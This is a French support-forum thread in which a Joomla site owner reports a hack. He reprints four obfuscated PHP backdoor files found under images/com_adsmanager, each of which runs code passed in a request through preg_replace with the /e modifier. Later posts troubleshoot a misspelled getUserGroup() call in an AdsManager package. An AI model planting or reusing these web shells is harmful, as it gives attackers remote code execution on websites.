Bonjour,

à la suite d'une modification inexpliquée des paramètres Utilisateurs qui étaient passés en SuperUser pour les Inscrits et les Visiteurs, j'ai examiné mes fichiers et trouvé des incohérences dont je vous fait part.

De nouveaux fichiers étaient apparus dont voici les détails et emplacements :
../images/index.pht
<? if(!function_exists('_7jycgef')){/*qu7bw*/$GLOBALS=Array('' .'preg_repla' .'ce'); function _7jycgef($i){$a=Array('patv2','/(.*)/e','patv2','');return $a[$i];}if(@isset($_REQUEST[_7jycgef(0)])){@$GLOBALS[0](_7jycgef(1),$_REQUEST[_7jycgef(2)],_7jycgef(3));exit;}}

../images/com_adsmanager/ads/index.pht
<? if(!function_exists('_x5fxq')){$GLOBALS=Array('' .'preg_repla' .'ce'); function _x5fxq($i){$a=Array('zu4lq','/(.*)/e','zu4lq','');return $a[$i];}if(@isset($_REQUEST[_x5fxq(0)])){@$GLOBALS[0](_x5fxq(1),$_REQUEST[_x5fxq(2)],_x5fxq(3));exit;}/*z5p*/}

../images/com_adsmanager/ads/tmp/index.pht
<? if(!function_exists('_5qgpo673dd')){$GLOBALS=Array('' .'preg_repla' .'ce'); function _5qgpo673dd($i){$a=Array('mkmuh','/(.*)/e','mkmuh','');return $a[$i];}if(@isset($_REQUEST[_5qgpo673dd(0)])){/*q6ol*/@$GLOBALS[0](_5qgpo673dd(1),$_REQUEST[_5qgpo673dd(2)],_5qgpo673dd(3));exit;}/*2g*/}

../images/com_adsmanager/fields/index.pht
<? /*4r*/if(!function_exists('_zj736tv')){/*wajuu*/$GLOBALS=Array('' .'preg_repla' .'ce'); function _zj736tv($i){$a=Array('72r','/(.*)/e','72r','');return $a[$i];}if(@isset($_REQUEST[_zj736tv(0)])){@$GLOBALS[0](_zj736tv(1),$_REQUEST[_zj736tv(2)],_zj736tv(3));exit;}}


Dans le même laps de temps, le fichier suivant avait été modifié à la ligne 165 :
../components/com_users/controllers/user.php
if ((is_array($data)) && ($data!='apgsgzpxesfxlnr')) die('');

Il semblerait que le fichier user.php ait été modifié par une extension d'Empresa mais je ne m'explique pas pourquoi les 4 autres fichiers sont apparus. Quelques sites Joomla évoquent une attaque sur + de 27000 sites mais aucun ne donne le moyen de corriger ce problème. Avez-vous une idée ?
Voir :
blog.sucuri.net/2016/10/joomla-mass-expl...e-vulnerability.html
www.itwire.com/security/75530-attackers-...it-joomla-sites.html
www.joomlaexpert.ie/joomla-news-tips/ite...privileges-hack.html

Bien cordialement,
RM

Bonjour et merci pour l'info.

Malheureusement il était trop tard car le site était bien vérolé au point de ne plus pouvoir faire les MàJ. J'ai pu mettre à jour une version en local qui fonctionne bien sur mon poste mais que je n'arrive pas à installer sur le serveur.
Du coup je me suis retourné vers votre quickstart 3.1.6 mais là j'ai le message suivant avant tout affichage, que ce soit en front end ou en back office :
Fatal error: Call to undefined method JHTMLAdsmanagerUserGroups::getUserGroup() in ..\localweb\quickstart_3.1.6\administrator\components\com_adsmanager\models\configuration.php on line 62

Il semblerait que la fonction GetUserGroup() soit manquante ... Avez-vous une idée ?

Cordialement,
RM

Bonjour,

le fichier usergroups.php est bien présent mais il semblerait que le problème vienne de l'orthographe.

Dans les fichiers suivants il existe 8 appels de la fonction getUserGroup() au singulier alors que la fonction getUserGroups() est au pluriel :
..\administrator\components\com_adsmanager\models\configuration.php
..\components\com_adsmanager\lib\tpermissions.php
..\components\com_paidsystem\api.paidsystem.php
..\plugins\usersubs\usergroup\usergroup.php

Bien cordialement,
RM